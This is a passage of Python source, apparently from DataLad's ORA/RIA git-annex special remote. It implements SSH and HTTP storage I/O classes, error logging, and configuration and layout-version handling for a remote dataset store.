elaborated error distinction\n\n # see: https://git-annex.branchable.com/internals/key_format/\n key_parts = key.split('--')\n key_fields = key_parts[0].split('-')\n\n s = S = C = None\n\n for field in key_fields[1:]: # note: first has to be backend -> ignore\n if field.startswith('s'):\n # size of the annexed file content:\n s = int(field[1:]) if field[1:].isdigit() else None\n elif field.startswith('S'):\n # we have a chunk and that's the chunksize:\n S = int(field[1:]) if field[1:].isdigit() else None\n elif field.startswith('C'):\n # we have a chunk, this is it's number:\n C = int(field[1:]) if field[1:].isdigit() else None\n\n if s is None:\n return None\n elif S is None and C is None:\n return s\n elif S and C:\n if C <= int(s / S):\n return S\n else:\n return s % S\n else:\n raise RIARemoteError(\"invalid key: {}\".format(key))\n\n def _run(self, cmd, no_output=True, check=False):\n\n # TODO: we might want to redirect stderr to stdout here (or have\n # additional end marker in stderr) otherwise we can't empty stderr\n # to be ready for next command. We also can't read stderr for\n # better error messages (RemoteError) without making sure there's\n # something to read in any case (it's blocking!).\n # However, if we are sure stderr can only ever happen if we would\n # raise RemoteError anyway, it might be okay.\n call = self._append_end_markers(cmd)\n self.shell.stdin.write(call.encode())\n self.shell.stdin.flush()\n\n lines = []\n while True:\n line = self.shell.stdout.readline().decode()\n lines.append(line)\n if line == self.REMOTE_CMD_OK + '\\n':\n # end reading\n break\n elif line == self.REMOTE_CMD_FAIL + '\\n':\n if check:\n raise RemoteCommandFailedError(\n \"{cmd} failed: {msg}\".format(cmd=cmd,\n msg=\"\".join(lines[:-1]))\n )\n else:\n break\n if no_output and len(lines) > 1:\n raise RIARemoteError(\"{}: {}\".format(call, \"\".join(lines)))\n return \"\".join(lines[:-1])\n\n @contextmanager\n def ensure_writeable(self, path):\n \"\"\"Context manager to get write permission on `path` and restore\n original mode afterwards.\n\n If git-annex ever touched the key store, the keys will be in mode 444\n directories, and we need to obtain permission first.\n\n Parameters\n ----------\n path: Path\n path to the target file\n \"\"\"\n\n path = sh_quote(str(path))\n # remember original mode -- better than to prescribe a fixed mode\n\n if on_osx:\n format_option = \"-f%Dp\"\n # on macOS this would return decimal representation of mode (same\n # as python's stat().st_mode\n conversion = int\n else: # win is currently ignored anyway\n format_option = \"--format=\\\"%f\\\"\"\n # in opposition to the above form for macOS, on debian this would\n # yield the hexadecimal representation of the mode; hence conversion\n # needed.\n conversion = functools.partial(int, base=16)\n\n output = self._run(f\"stat {format_option} {path}\",\n no_output=False, check=True)\n mode = conversion(output)\n if not mode & stat.S_IWRITE:\n new_mode = oct(mode | stat.S_IWRITE)[-3:]\n self._run(f\"chmod {new_mode} {path}\")\n changed = True\n else:\n changed = False\n try:\n yield\n finally:\n if changed:\n # restore original mode\n self._run(\"chmod {mode} {file}\".format(mode=oct(mode)[-3:],\n file=path),\n check=False) # don't fail if path doesn't exist\n # anymore\n\n def mkdir(self, path):\n self._run('mkdir -p {}'.format(sh_quote(str(path))))\n\n def symlink(self, target, link_name):\n self._run('ln -s {} {}'.format(sh_quote(str(target)), sh_quote(str(link_name))))\n\n def put(self, src, dst, progress_cb):\n self.ssh.put(str(src), str(dst))\n\n def get(self, src, dst, progress_cb):\n\n # Note, that as we are in blocking mode, we can't easily fail on the\n # actual get (that is 'cat').\n # Therefore check beforehand.\n if not self.exists(src):\n raise RIARemoteError(\"annex object {src} does not exist.\"\n \"\".format(src=src))\n\n from os.path import basename\n key = basename(str(src))\n try:\n size = self._get_download_size_from_key(key)\n except RemoteError as e:\n raise RemoteError(f\"src: {src}\") from e\n\n if size is None:\n # rely on SCP for now\n self.ssh.get(str(src), str(dst))\n return\n\n # TODO: see get_from_archive()\n\n # TODO: Currently we will hang forever if the file isn't readable and\n # it's supposed size is bigger than whatever cat spits out on\n # stdout. This is because we don't notice that cat has exited\n # non-zero. We could have end marker on stderr instead, but then\n # we need to empty stderr beforehand to not act upon output from\n # earlier calls. This is a problem with blocking reading, since we\n # need to make sure there's actually something to read in any\n # case.\n cmd = 'cat {}'.format(sh_quote(str(src)))\n self.shell.stdin.write(cmd.encode())\n self.shell.stdin.write(b\"\\n\")\n self.shell.stdin.flush()\n\n with open(dst, 'wb') as target_file:\n bytes_received = 0\n while bytes_received < size:\n # TODO: some additional abortion criteria? check stderr in\n # addition?\n c = self.shell.stdout.read1(self.buffer_size)\n # no idea yet, whether or not there's sth to gain by a\n # sophisticated determination of how many bytes to read at once\n # (like size - bytes_received)\n if c:\n bytes_received += len(c)\n target_file.write(c)\n progress_cb(bytes_received)\n\n def rename(self, src, dst):\n with self.ensure_writeable(dst.parent):\n self._run('mv {} {}'.format(sh_quote(str(src)), sh_quote(str(dst))))\n\n def remove(self, path):\n try:\n with self.ensure_writeable(path.parent):\n self._run('rm {}'.format(sh_quote(str(path))), check=True)\n except RemoteCommandFailedError as e:\n raise RIARemoteError(f\"Unable to remove {path} \"\n \"or to obtain write permission in parent directory.\") from e\n\n def remove_dir(self, path):\n with self.ensure_writeable(path.parent):\n self._run('rmdir {}'.format(sh_quote(str(path))))\n\n def exists(self, path):\n try:\n self._run('test -e {}'.format(sh_quote(str(path))), check=True)\n return True\n except RemoteCommandFailedError:\n return False\n\n def in_archive(self, archive_path, file_path):\n\n if not self.exists(archive_path):\n return False\n\n loc = str(file_path)\n # query 7z for the specific object location, keeps the output\n # lean, even for big archives\n cmd = '7z l {} {}'.format(\n sh_quote(str(archive_path)),\n sh_quote(loc))\n\n # Note: Currently relies on file_path not showing up in case of failure\n # including non-existent archive. If need be could be more sophisticated\n # and called with check=True + catch RemoteCommandFailedError\n out = self._run(cmd, no_output=False, check=False)\n\n return loc in out\n\n def get_from_archive(self, archive, src, dst, progress_cb):\n\n # Note, that as we are in blocking mode, we can't easily fail on the\n # actual get (that is 'cat'). Therefore check beforehand.\n if not self.exists(archive):\n raise RIARemoteError(\"archive {arc} does not exist.\"\n \"\".format(arc=archive))\n\n # TODO: We probably need to check exitcode on stderr (via marker). If\n # archive or content is missing we will otherwise hang forever\n # waiting for stdout to fill `size`.\n\n cmd = '7z x -so {} {}\\n'.format(\n sh_quote(str(archive)),\n sh_quote(str(src)))\n self.shell.stdin.write(cmd.encode())\n self.shell.stdin.flush()\n\n # TODO: - size needs double-check and some robustness\n # - can we assume src to be a posixpath?\n # - RF: Apart from the executed command this should be pretty much\n # identical to self.get(), so move that code into a common\n # function\n\n from os.path import basename\n size = self._get_download_size_from_key(basename(str(src)))\n\n with open(dst, 'wb') as target_file:\n bytes_received = 0\n while bytes_received < size:\n c = self.shell.stdout.read1(self.buffer_size)\n if c:\n bytes_received += len(c)\n target_file.write(c)\n progress_cb(bytes_received)\n\n def read_file(self, file_path):\n\n cmd = \"cat {}\".format(sh_quote(str(file_path)))\n try:\n out = self._run(cmd, no_output=False, check=True)\n except RemoteCommandFailedError as e:\n # Currently we don't read stderr. All we know is, we couldn't read.\n # Try narrowing it down by calling a subsequent exists()\n if not self.exists(file_path):\n raise FileNotFoundError(f\"{str(file_path)} not found.\") from e\n else:\n raise RuntimeError(f\"Could not read {file_path}\") from e\n\n return out\n\n def write_file(self, file_path, content, mode='w'):\n\n if mode == 'w':\n mode = \">\"\n elif mode == 'a':\n mode = \">>\"\n else:\n raise ValueError(\"Unknown mode '{}'\".format(mode))\n if not content.endswith('\\n'):\n content += '\\n'\n\n cmd = \"printf '%s' {} {} {}\".format(\n sh_quote(content),\n mode,\n sh_quote(str(file_path)))\n try:\n self._run(cmd, check=True)\n except RemoteCommandFailedError as e:\n raise RIARemoteError(f\"Could not write to {file_path}\") from e\n\n def get_7z(self):\n # TODO: To not rely on availability in PATH we might want to use `which`\n # (`where` on windows) and get the actual path to 7z to re-use in\n # in_archive() and get().\n # Note: `command -v XXX` or `type` might be cross-platform\n # solution!\n # However, for availability probing only, it would be sufficient\n # to just call 7z and see whether it returns zero.\n\n try:\n self._run(\"7z\", check=True, no_output=False)\n return True\n except RemoteCommandFailedError:\n return False\n\n # try:\n # out = self._run(\"which 7z\", check=True, no_output=False)\n # return out\n # except RemoteCommandFailedError:\n # return None\n\n\nclass HTTPRemoteIO(object):\n # !!!!\n # This is not actually an IO class like SSHRemoteIO and LocalIO and needs\n # respective RF'ing of special remote implementation eventually.\n # We want ORA over HTTP, but with a server side CGI to talk to in order to\n # reduce the number of requests. Implementing this as such an IO class would\n # mean to have separate requests for all server side executions, which is\n # what we do not want. As a consequence ORARemote class implementation needs\n # to treat HTTP as a special case until refactoring to a design that fits\n # both approaches.\n\n # NOTE: For now read-only. Not sure yet whether an IO class is the right\n # approach.\n\n def __init__(self, url, buffer_size=DEFAULT_BUFFER_SIZE):\n from datalad.downloaders.providers import Providers\n if not url.startswith(\"http\"):\n raise RIARemoteError(\"Expected HTTP URL, but got {}\".format(url))\n\n self.store_url = url.rstrip('/')\n\n # make sure default is used when None was passed, too.\n self.buffer_size = buffer_size if buffer_size else DEFAULT_BUFFER_SIZE\n self._providers = Providers.from_config_files()\n\n def checkpresent(self, key_path):\n # Note, that we need the path with hash dirs, since we don't have access\n # to annexremote.dirhash from within IO classes\n\n return self.exists(key_path)\n\n def get(self, key_path, filename, progress_cb):\n # Note, that we need the path with hash dirs, since we don't have access\n # to annexremote.dirhash from within IO classes\n\n url = self.store_url + str(key_path)\n self._providers.download(url, path=filename, overwrite=True)\n\n def exists(self, path):\n # use same signature as in SSH and Local IO, although validity is\n # limited in case of HTTP.\n url = self.store_url + path.as_posix()\n try:\n response = requests.head(url, allow_redirects=True)\n except Exception as e:\n raise RIARemoteError from e\n\n return response.status_code == 200\n\n def read_file(self, file_path):\n\n from datalad.support.network import download_url\n url = self.store_url + file_path.as_posix()\n try:\n content = download_url(url)\n\n # NOTE re Exception handling:\n # We reraise here to:\n # 1. Unify exceptions across IO classes\n # 2. Get cleaner user messages. ATM what we get from the\n # Downloaders are exceptions, that have their cause-chain baked\n # into their string rather than being e proper exception chain.\n # Hence, we can't generically extract the ultimate cause.\n # RemoteError will eventually pass the entire chain string to\n # annex. If we add our own exception here on top, this is what is\n # displayed first to the user, rather than being buried deep into\n # a hard to parse message.\n except AccessDeniedError as exc:\n raise PermissionError(f\"Permission denied: '{url}'\") from exc\n\n except DownloadError as exc:\n # Note: This comes from the downloader. `check_response_status`\n # in downloaders/http.py does not currently use\n # `raise_from_status`, hence we don't get a proper HTTPError to\n # check for a 404 and thereby distinguish from connection issues.\n # When this is addressed in the downloader code, we need to\n # adjust here.\n if \"not found\" in str(exc):\n # Raise uniform exception across IO classes:\n raise FileNotFoundError(f\"{url} not found.\") from exc\n else:\n # Note: There's AccessFailedError(DownloadError) as well.\n # However, we can't really tell them meaningfully apart,\n # since possible underlying HTTPErrors, etc. are baked into\n # their strings. Hence, \"Failed to access\" is what we can\n # tell here in either case.\n raise RuntimeError(f\"Failed to access {url}\") from exc\n return content\n\n\ndef handle_errors(func):\n \"\"\"Decorator to convert and log errors\n\n Intended to use with every method of RiaRemote class, facing the outside\n world. In particular, that is about everything, that may be called via\n annex' special remote protocol, since a non-RemoteError will simply result\n in a broken pipe by default handling.\n \"\"\"\n\n # TODO: configurable on remote end (flag within layout_version!)\n\n @wraps(func)\n def _wrap_handle_errors(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except Exception as e:\n if self.remote_log_enabled:\n try:\n from datetime import datetime\n from traceback import format_exc\n exc_str = format_exc()\n entry = \"{time}: Error:\\n{exc_str}\\n\" \\\n \"\".format(time=datetime.now(),\n exc_str=exc_str)\n # ensure base path is platform path\n log_target = (\n url_path2local_path(self.store_base_path)\n / \"error_logs\"\n / \"{dsid}.{uuid}.log\".format(\n dsid=self.archive_id,\n uuid=self._repo.uuid))\n self.io.write_file(log_target, entry, mode='a')\n except Exception:\n # If logging of the exception does fail itself, there's\n # nothing we can do about it. Hence, don't log and report\n # the original issue only.\n # TODO: With a logger that doesn't sabotage the\n # communication with git-annex, we should be abe to use\n # CapturedException here, in order to get an informative\n # traceback in a debug message.\n pass\n\n try:\n # We're done using io, so let it perform any needed cleanup. At\n # the moment, this is only relevant for SSHRemoteIO, in which\n # case it cleans up the SSH socket and prevents a hang with\n # git-annex 8.20201103 and later.\n from atexit import unregister\n if self._io:\n self._io.close()\n unregister(self._io.close)\n if self._push_io:\n self._push_io.close()\n unregister(self._push_io.close)\n except AttributeError:\n # seems like things are already being cleaned up -> a good\n pass\n except Exception:\n # anything else: Not a problem. We are about to exit anyway\n pass\n\n if not isinstance(e, RIARemoteError):\n raise RIARemoteError from e\n else:\n raise e\n\n return _wrap_handle_errors\n\n\nclass NoLayoutVersion(Exception):\n pass\n\n\nclass ORARemote(SpecialRemote):\n \"\"\"This is the class of RIA remotes.\n \"\"\"\n\n dataset_tree_version = '1'\n object_tree_version = '2'\n # TODO: Move known versions. Needed by creation routines as well.\n known_versions_objt = ['1', '2']\n known_versions_dst = ['1']\n\n @handle_errors\n def __init__(self, annex):\n super(ORARemote, self).__init__(annex)\n if hasattr(self, 'configs'):\n # introduced in annexremote 1.4.2 to support LISTCONFIGS\n self.configs['url'] = \"RIA store to use\"\n self.configs['push-url'] = \"URL for pushing to the RIA store. \" \\\n \"Optional.\"\n self.configs['archive-id'] = \"Dataset ID (fallback: annex uuid. \" \\\n \"Should be set automatically by \" \\\n \"datalad\"\n # the local repo\n self._repo = None\n self.gitdir = None\n self.name = None # name of the special remote\n self.gitcfg_name = None # name in respective git remote\n\n self.ria_store_url = None\n self.ria_store_pushurl = None\n # machine to SSH-log-in to access/store the data\n # subclass must set this\n self.storage_host = None\n self.storage_host_push = None\n # must be absolute, and POSIX (will be instance of PurePosixPath)\n # subclass must set this\n self.store_base_path = None\n self.store_base_path_push = None\n # by default we can read and write\n self.read_only = False\n self.force_write = None\n self.ignore_remote_config = None\n self.remote_log_enabled = None\n self.remote_dataset_tree_version = None\n self.remote_object_tree_version = None\n\n # for caching the remote's layout locations:\n self.remote_git_dir = None\n self.remote_archive_dir = None\n self.remote_obj_dir = None\n # lazy IO:\n self._io = None\n self._push_io = None\n\n # cache obj_locations:\n self._last_archive_path = None\n self._last_keypath = (None, None)\n\n # SSH \"streaming\" buffer\n self.buffer_size = DEFAULT_BUFFER_SIZE\n\n def verify_store(self):\n \"\"\"Check whether the store exists and reports a layout version we\n know\n\n The layout of the store is recorded in base_path/ria-layout-version.\n If the version found on the remote end isn't supported and `force-write`\n isn't configured, sets the remote to read-only operation.\n \"\"\"\n\n # ensure base path is platform path\n dataset_tree_version_file = \\\n url_path2local_path(self.store_base_path) / 'ria-layout-version'\n\n # check dataset tree version\n try:\n self.remote_dataset_tree_version = \\\n self._get_version_config(dataset_tree_version_file)\n except Exception as exc:\n raise RIARemoteError(\"RIA store unavailable.\") from exc\n if self.remote_dataset_tree_version not in self.known_versions_dst:\n # Note: In later versions, condition might change in order to\n # deal with older versions.\n raise UnknownLayoutVersion(f\"RIA store layout version unknown: \"\n f\"{self.remote_dataset_tree_version}\")\n\n def verify_ds_in_store(self):\n \"\"\"Check whether the dataset exists in store and reports a layout\n version we know\n\n The layout is recorded in\n 'dataset_somewhere_beneath_base_path/ria-layout-version.'\n If the version found on the remote end isn't supported and `force-write`\n isn't configured, sets the remote to read-only operation.\n \"\"\"\n\n object_tree_version_file = self.remote_git_dir / 'ria-layout-version'\n\n # check (annex) object tree version\n try:\n self.remote_object_tree_version =\\\n self._get_version_config(object_tree_version_file)\n except Exception as e:\n raise RIARemoteError(\"Dataset unavailable from RIA store.\")\n if self.remote_object_tree_version not in self.known_versions_objt:\n raise UnknownLayoutVersion(f\"RIA dataset layout version unknown: \"\n f\"{self.remote_object_tree_version}\")\n\n def _load_local_cfg(self):\n\n # this will work, even when this is not a bare repo\n # but it is not capable of reading out dataset/branch config\n self._repo = AnnexRepo(self.gitdir)\n\n cfg_map = {\"ora-force-write\": \"force_write\",\n \"ora-ignore-ria-config\": \"ignore_remote_config\",\n \"ora-buffer-size\": \"buffer_size\",\n \"ora-url\": \"ria_store_url\",\n \"ora-push-url\": \"ria_store_pushurl\"\n }\n\n # in initremote we may not have a reliable name of the git remote config\n # yet. Go with the default.\n gitcfg_name = self.gitcfg_name or self.name\n if gitcfg_name:\n for cfg, att in cfg_map.items():\n value = self._repo.config.get(f\"remote.{gitcfg_name}.{cfg}\")\n if value is not None:\n self.__setattr__(cfg_map[cfg], value)\n if cfg == \"ora-url\":\n self.ria_store_url_source = 'local'\n elif cfg == \"ora-push-url\":\n self.ria_store_pushurl_source = 'local'\n if self.buffer_size:\n try:\n self.buffer_size = int(self.buffer_size)\n except ValueError:\n self.message(f\"Invalid value of config \"\n f\"'remote.{gitcfg_name}.\"\n f\"ora-buffer-size': {self.buffer_size}\")\n self.buffer_size = DEFAULT_BUFFER_SIZE\n\n if self.name:\n # Consider deprecated configs if there's no value yet\n if self.force_write is None:\n self.force_write = self._repo.config.get(\n f'annex.ora-remote.{self.name}.force-write')\n if self.force_write:\n self.message(\"WARNING: config \"\n \"'annex.ora-remote.{}.force-write' is \"\n \"deprecated. Use 'remote.{}.ora-force-write' \"\n \"instead.\".format(self.name, self.gitcfg_name))\n try:\n self.force_write = anything2bool(self.force_write)\n except TypeError:\n raise RIARemoteError(\"Invalid value of config \"\n \"'annex.ora-remote.{}.force-write'\"\n \": {}\".format(self.name,\n self.force_write))\n\n if self.ignore_remote_config is None:\n self.ignore_remote_config = self._repo.config.get(\n f\"annex.ora-remote.{self.name}.ignore-remote-config\")\n if self.ignore_remote_config:\n self.message(\"WARNING: config \"\n \"'annex.ora-remote.{}.ignore-remote-config' is\"\n \" deprecated. Use \"\n \"'remote.{}.ora-ignore-ria-config' instead.\"\n \"\".format(self.name, self.gitcfg_name))\n try:\n self.ignore_remote_config = \\\n anything2bool(self.ignore_remote_config)\n except TypeError:\n raise RIARemoteError(\n \"Invalid value of config \"\n \"'annex.ora-remote.{}.ignore-remote-config': {}\"\n \"\".format(self.name, self.ignore_remote_config))\n\n def _load_committed_cfg(self, fail_noid=True):\n\n # which repo are we talking about\n self.gitdir = self.annex.getgitdir()\n\n # go look for an ID\n self.archive_id = self.annex.getconfig('archive-id')\n if fail_noid and not self.archive_id:\n # TODO: Message! \"archive ID\" is confusing. dl-id or annex-uuid\n raise RIARemoteError(\n \"No archive ID configured. This should not happen.\")\n\n # what is our uuid?\n self.uuid = self.annex.getuuid()\n\n # RIA store URL(s)\n self.ria_store_url = self.annex.getconfig('url')\n if self.ria_store_url:\n self.ria_store_url_source = 'annex'\n self.ria_store_pushurl = self.annex.getconfig('push-url')\n if self.ria_store_pushurl:\n self.ria_store_pushurl_source = 'annex'\n\n # TODO: This should prob. not be done! Would only have an effect if\n # force-write was committed annex-special-remote-config and this\n # is likely a bad idea.\n self.force_write = self.annex.getconfig('force-write')\n if self.force_write == \"\":\n self.force_write = None\n\n # Get the special remote name\n # TODO: Make 'name' a property of `SpecialRemote`;\n # Same for `gitcfg_name`, `_repo`?\n self.name = self.annex.getconfig('name')\n if not self.name:\n self.name = self.annex.getconfig('sameas-name')\n if not self.name:\n # TODO: Do we need to crash? Not necessarily, I think. We could\n # still find configs and if not - might work out.\n raise RIARemoteError(\n \"Cannot determine special remote name, got: {}\".format(\n repr(self.name)))\n # Get the name of the remote entry in .git/config.\n # Note, that this by default is the same as the stored name of the\n # special remote, but can be different (for example after\n # git-remote-rename). The actual connection is the uuid of the special\n # remote, not the name.\n try:\n self.gitcfg_name = self.annex.getgitremotename()\n except (ProtocolError, AttributeError):\n # GETGITREMOTENAME not supported by annex version or by annexremote\n # version.\n # Lets try to find ourselves: Find remote with matching annex uuid\n response = _get_gitcfg(self.gitdir,\n r\"^remote\\..*\\.annex-uuid\",\n regex=True)\n response = response.splitlines() if response else []\n candidates = set()\n for line in response:\n k, v = line.split()\n if v == self.annex.getuuid(): # TODO: Where else? self.uuid?\n candidates.add(''.join(k.split('.')[1:-1]))\n num_candidates = len(candidates)\n if num_candidates == 1:\n self.gitcfg_name = candidates.pop()\n elif num_candidates > 1:\n self.message(\"Found multiple used remote names in git \"\n \"config: %s\" % str(candidates))\n # try same name:\n if self.name in candidates:\n self.gitcfg_name = self.name\n self.message(\"Choose '%s'\" % self.name)\n else:\n self.gitcfg_name = None\n self.message(\"Ignore git config\")\n else:\n # No entry found.\n # Possible if we are in \"initremote\".\n self.gitcfg_name = None\n\n def _load_cfg(self, gitdir, name):\n # Whether or not to force writing to the remote. Currently used to\n # overrule write protection due to layout version mismatch.\n self.force_write = self._repo.config.get(\n f'annex.ora-remote.{name}.force-write')\n\n # whether to ignore config flags set at the remote end\n self.ignore_remote_config = \\\n self._repo.config.get(\n f'annex.ora-remote.{name}.ignore-remote-config')\n\n # buffer size for reading files over HTTP and SSH\n self.buffer_size = self._repo.config.get(\n f\"remote.{name}.ora-buffer-size\")\n\n if self.buffer_size:\n self.buffer_size = int(self.buffer_size)\n\n def _verify_config(self, fail_noid=True):\n # try loading all needed info from (git) config\n\n # first load committed config\n self._load_committed_cfg(fail_noid=fail_noid)\n # now local configs (possible overwrite of committed)\n self._load_local_cfg()\n\n # get URL rewriting config\n url_cfgs = {k: v for k, v in self._repo.config.items()\n if k.startswith('url.')}\n\n if self.ria_store_url:\n self.storage_host, self.store_base_path, self.ria_store_url = \\\n verify_ria_url(self.ria_store_url, url_cfgs)\n\n else:\n # There's one exception to the precedence of local configs:\n # Age-old \"ssh-host\" + \"base-path\" configs are only considered,\n # if there was no RIA URL (local or committed). However, issue\n # deprecation warning, if that situation is encountered:\n host = None\n path = None\n\n if self.name:\n host = self._repo.config.get(\n f'annex.ora-remote.{self.name}.ssh-host') or \\\n self.annex.getconfig('ssh-host')\n # Note: Special value '0' is replaced by None only after checking\n # the repository's annex config. This is to uniformly handle '0' and\n # None later on, but let a user's config '0' overrule what's\n # stored by git-annex.\n self.storage_host = None if host == '0' else host\n path = self._repo.config.get(\n f'annex.ora-remote.{self.name}.base-path') or \\\n self.annex.getconfig('base-path')\n self.store_base_path = path.strip() if path else path\n\n if path or host:\n self.message(\"WARNING: base-path + ssh-host configs are \"\n \"deprecated and won't be considered in the future.\"\n \" Use 'git annex enableremote {} \"\n \"url=<RIA-URL-TO-STORE>' to store a ria+<scheme>:\"\n \"//... URL in the special remote's config.\"\n \"\".format(self.name),\n type='info')\n\n\n if not self.store_base_path:\n raise RIARemoteError(\n \"No base path configured for RIA store. Specify a proper \"\n \"ria+<scheme>://... URL.\")\n\n # the base path is ultimately derived from a URL, always treat as POSIX\n self.store_base_path = PurePosixPath(self.store_base_path)\n if not self.store_base_path.is_absolute():\n raise RIARemoteError(\n 'Non-absolute RIA store base path configuration: %s'\n '' % str(self.store_base_path))\n\n if self.ria_store_pushurl:\n if self.ria_store_pushurl.startswith(\"ria+http\"):\n raise RIARemoteError(\"Invalid push-url: {}. Pushing over HTTP \"\n \"not implemented.\"\n \"\".format(self.ria_store_pushurl))\n self.storage_host_push, \\\n self.store_base_path_push, \\\n self.ria_store_pushurl = \\\n verify_ria_url(self.ria_store_pushurl, url_cfgs)\n self.store_base_path_push = PurePosixPath(self.store_base_path_push)\n\n def _get_version_config(self, path):\n \"\"\" Get version and config flags from RIA store's layout file\n \"\"\"\n\n if self.ria_store_url:\n # construct path to ria_layout_version file for reporting\n local_store_base_path = url_path2local_path(self.store_base_path)\n target_ri = (\n self.ria_store_url[4:]\n + \"/\"\n + path.relative_to(local_store_base_path).as_posix()\n )\n elif self.storage_host:\n target_ri = \"ssh://{}{}\".format(self.storage_host, path.as_posix())\n else:\n target_ri = path.as_uri()\n\n try:\n file_content = self.io.read_file(path).strip().split('|')\n\n # Note, that we enhance the reporting here, as the IO classes don't\n # uniformly operate on that kind of RI (which is more informative\n # as it includes the store base address including the access\n # method).\n except FileNotFoundError as exc:\n raise NoLayoutVersion(\n f\"{target_ri} not found, \"\n f\"self.ria_store_url: {self.ria_store_url}, \"\n f\"self.store_base_pass: {self.store_base_path}, \"\n f\"self.store_base_pass_push: {self.store_base_path_push}, \"\n f\"path: {type(path)} {path}\") from exc\n except PermissionError as exc:\n raise PermissionError(f\"Permission denied: {target_ri}\") from exc\n except Exception as exc:\n raise RuntimeError(f\"Failed to access {target_ri}\") from exc\n\n if not (1 <= len(file_content) <= 2):\n self.message(\"invalid version file {}\".format(path),\n type='info')\n return None\n\n remote_version = file_content[0]\n remote_config_flags = file_content[1] \\\n if len(file_content) == 2 else None\n if not self.ignore_remote_config and remote_config_flags:\n # Note: 'or', since config flags can come from toplevel\n # (dataset-tree-root) as well as from dataset-level.\n # toplevel is supposed flag the entire tree.\n self.remote_log_enabled = self.remote_log_enabled or \\\n 'l' in remote_config_flags\n\n return remote_version\n\n def get_store(self):\n \"\"\"checks the remote end for an existing store and dataset\n\n Furthermore reads and stores version and config flags, layout\n locations, etc.\n If this doesn't raise, the remote end should be fine to work with.\n \"\"\"\n # make sure the base path is a platform path when doing local IO\n # the incoming Path object is a PurePosixPath\n # XXX this else branch is wrong: Incoming is PurePosixPath\n # but it is subsequently assumed to be a platform path, by\n # get_layout_locations() etc. Hence it must be converted\n # to match the *remote* platform, not the local client\n store_base_path = (\n url_path2local_path(self.store_base_path)\n if self._local_io\n else self.store_base_path)\n\n # cache remote layout directories\n self.remote_git_dir, self.remote_archive_dir, self.remote_obj_dir = \\\n self.get_layout_locations(store_base_path, self.archive_id)\n\n read_only_msg = \"Treating remote as read-only in order to \" \\\n \"prevent damage by putting things into an unknown \" \\\n \"version of the target layout. You can overrule this \" \\\n \"by setting 'annex.ora-remote.<name>.force-write=true'.\"\n try:\n self.verify_store()\n except UnknownLayoutVersion:\n reason = \"Remote dataset tree reports version {}. Supported \" \\\n \"versions are: {}. Consider upgrading datalad or \" \\\n \"fix the 'ria-layout-version' file at the RIA store's \" \\\n \"root. \".format(self.remote_dataset_tree_version,\n self.known_versions_dst)\n self._set_read_only(reason + read_only_msg)\n except NoLayoutVersion:\n reason = \"Remote doesn't report any dataset tree version. \" \\\n \"Consider upgrading datalad or add a fitting \" \\\n \"'ria-layout-version' file at the RIA store's \" \\\n \"root.\"\n self._set_read_only(reason + read_only_msg)\n\n try:\n self.verify_ds_in_store()\n except UnknownLayoutVersion:\n reason = \"Remote object tree reports version {}. Supported\" \\\n \"versions are {}. Consider upgrading datalad or \" \\\n \"fix the 'ria-layout-version' file at the remote \" \\\n \"dataset root. \" \\\n \"\".format(self.remote_object_tree_version,\n self.known_versions_objt)\n self._set_read_only(reason + read_only_msg)\n except NoLayoutVersion:\n reason = \"Remote doesn't report any object tree version. \" \\\n \"Consider upgrading datalad or add a fitting \" \\\n \"'ria-layout-version' file at the remote \" \\\n \"dataset root. \"\n self._set_read_only(reason + read_only_msg)\n\n @handle_errors\n def initremote(self):\n self._verify_config(fail_noid=False)\n if not self.archive_id:\n self.archive_id = _get_datalad_id(self.gitdir)\n if not self.archive_id:\n # fall back on the UUID for the annex remote\n self.archive_id = self.annex.getuuid()\n\n self.get_store()\n\n self.annex.setconfig('archive-id', self.archive_id)\n # Make sure, we store the potentially rewritten URL. But only, if the\n # source was annex as opposed to a local config.\n if self.ria_store_url and self.ria_store_url_source == 'annex':\n self.annex.setconfig('url', self.ria_store_url)\n if self.ria_store_pushurl and self.ria_store_pushurl_source == 'annex':\n self.annex.setconfig('push-url', self.ria_store_pushurl)\n\n def _local_io(self):\n \"\"\"Are we doing local operations?\"\"\"\n # let's not make this decision dependent on the existence\n # of a directory the matches the name of the configured\n # store tree base dir. Such a match could be pure\n # coincidence. Instead, let's do remote whenever there\n # is a remote host configured\n #return self.store_base_path.is_dir()\n\n # TODO: Isn't that wrong with HTTP anyway?\n # + just isinstance(LocalIO)?\n # XXX isinstance(LocalIO) would not work, this method is used\n # before LocalIO is instantiated\n return not self.storage_host\n\n def _set_read_only(self, msg):\n\n if not self.force_write:\n self.read_only = True\n self.message(msg, type='info')\n else:\n self.message(\"Was instructed to force write\", type='info')\n\n def _ensure_writeable(self):\n if self.read_only:\n raise RIARemoteError(\"Remote is treated as read-only. \"\n \"Set 'ora-remote.<name>.force-write=true' to \"\n \"overrule this.\")\n if isinstance(self.push_io, HTTPRemoteIO):\n raise RIARemoteError(\"Write access via HTTP not implemented\")\n\n @property\n def io(self):\n if not self._io:\n if self._local_io():\n self._io = LocalIO()\n elif self.ria_store_url.startswith(\"ria+http\"):\n # TODO: That construction of \"http(s)://host/\" should probably\n # be moved, so that we get that when we determine\n # self.storage_host. In other words: Get the parsed URL\n # instead and let HTTPRemoteIO + SSHRemoteIO deal with it\n # uniformly. Also: Don't forget about a possible port.\n\n url_parts = self.ria_store_url[4:].split('/')\n # we expect parts: (\"http(s):\", \"\", host:port, path)\n self._io = HTTPRemoteIO(\n url_parts[0] + \"//\" + url_parts[2],\n self.buffer_size\n )\n elif self.storage_host:\n self._io = SSHRemoteIO(self.storage_host, self.buffer_size)\n from atexit import register\n register(self._io.close)\n else:\n raise RIARemoteError(\n \"Local object tree base path does not exist, and no SSH\"\n \"host configuration found.\")\n return self._io\n\n @property\n def push_io(self):\n # Instance of an IOBase subclass for execution based on configured\n # 'push-url' if such exists. Otherwise identical to `self.io`.\n # Note, that once we discover we need to use the push-url (that is on\n # TRANSFER_STORE and REMOVE), we should switch all operations to that IO\n # instance instead of using different connections for read and write\n # operations. Ultimately this is due to the design of annex' special\n # remote protocol - we don't know which annex command is running and\n # therefore we don't know whether to use fetch or push URL during\n # PREPARE.\n\n if not self._push_io:\n if self.ria_store_pushurl:\n self.message(\"switching ORA to push-url\")\n # Not-implemented-push-HTTP is ruled out already when reading\n # push-url, so either local or SSH:\n if not self.storage_host_push:\n # local operation\n self._push_io = LocalIO()\n else:\n self._push_io = SSHRemoteIO(self.storage_host_push,\n self.buffer_size)\n\n # We have a new instance. Kill the existing one and replace.\n from atexit import register, unregister\n if hasattr(self.io, 'close'):\n unregister(self.io.close)\n self.io.close()\n\n # XXX 